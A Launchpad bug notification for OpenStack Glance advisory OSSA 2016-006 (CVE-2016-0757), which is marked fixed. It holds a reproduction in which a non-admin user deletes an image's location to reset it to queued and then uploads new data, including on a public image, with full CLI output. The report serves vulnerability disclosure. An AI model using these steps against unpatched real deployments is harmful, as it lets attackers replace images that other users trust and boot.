** Changed in: glance/kilo
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1525915
Title:
[OSSA 2016-006] Normal user can change image status if
show_multiple_locations has been set to true (CVE-2016-0757)
Status in Glance:
Fix Released
Status in Glance kilo series:
Fix Released
Status in Glance liberty series:
Fix Committed
Status in OpenStack Security Advisory:
Fix Released
Bug description:
User (non admin) can set image back to queued state by deleting
location(s) from image when "show_multiple_locations" config parameter
has been set to true.
This breaks the immutability promise glance has similar way as
described in OSSA 2015-019 as the image gets transitioned from active
to queued and new image data can be uploaded.
ubuntu@devstack-02:~/devstack$ glance image-show
f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value
|
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4
|
| container_format | ami
|
| created_at | 2015-12-14T09:58:54Z
|
| disk_format | ami
|
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
|
| locations | [{"url":
"file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}]
|
| min_disk | 0
|
| min_ram | 0
|
| name | cirros-test
|
| owner | ab69274aa31a4fba8bf559af2b0b98bd
|
| protected | False
|
| size | 25165824
|
| status | active
|
| tags | []
|
| updated_at | 2015-12-14T09:58:54Z
|
| virtual_size | None
|
| visibility | private
|
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$ glance location-delete --url
file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show
f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-12-14T13:43:23Z |
| virtual_size | None |
| visibility | private |
+------------------+--------------------------------------+
ubuntu@devstack-02:~/devstack$ glance image-upload --file
files/images/cirros-0.3.4-x86_64-uec/cirros-0.3.4-x86_64-blank.img
f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show
f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value
|
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4
|
| container_format | ami
|
| created_at | 2015-12-14T09:58:54Z
|
| disk_format | ami
|
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
|
| locations | [{"url":
"file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}]
|
| min_disk | 0
|
| min_ram | 0
|
| name | cirros-test
|
| owner | ab69274aa31a4fba8bf559af2b0b98bd
|
| protected | False
|
| size | 25165824
|
| status | active
|
| tags | []
|
| updated_at | 2015-12-14T13:43:41Z
|
| virtual_size | None
|
| visibility | private
|
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$
This works also on public images.
ubuntu@devstack-02:~/devstack$ . ./openrc admin admin
ubuntu@devstack-02:~/devstack$ glance image-update --visibility=public
f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value
|
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4
|
| container_format | ami
|
| created_at | 2015-12-14T09:58:54Z
|
| disk_format | ami
|
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
|
| locations | [{"url":
"file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}]
|
| min_disk | 0
|
| min_ram | 0
|
| name | cirros-test
|
| owner | ab69274aa31a4fba8bf559af2b0b98bd
|
| protected | False
|
| size | 25165824
|
| status | active
|
| tags | []
|
| updated_at | 2015-12-14T13:45:11Z
|
| virtual_size | None
|
| visibility | public
|
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$ . ./openrc
ubuntu@devstack-02:~/devstack$ glance location-delete --url
file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show
f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-12-14T13:45:28Z |
| virtual_size | None |
| visibility | public |
+------------------+--------------------------------------+
ubuntu@devstack-02:~/devstack$ glance image-upload --file
files/images/cirros-0.3.4-x86_64-uec/cirros-0.3.4-x86_64-blank.img
f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show
f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value
|
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4
|
| container_format | ami
|
| created_at | 2015-12-14T09:58:54Z
|
| disk_format | ami
|
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
|
| locations | [{"url":
"file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}]
|
| min_disk | 0
|
| min_ram | 0
|
| name | cirros-test
|
| owner | ab69274aa31a4fba8bf559af2b0b98bd
|
| protected | False
|
| size | 25165824
|
| status | active
|
| tags | []
|
| updated_at | 2015-12-14T13:45:43Z
|
| virtual_size | None
|
| visibility | public
|
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1525915/+subscriptions
--
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : [email protected]
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help : https://help.launchpad.net/ListHelp
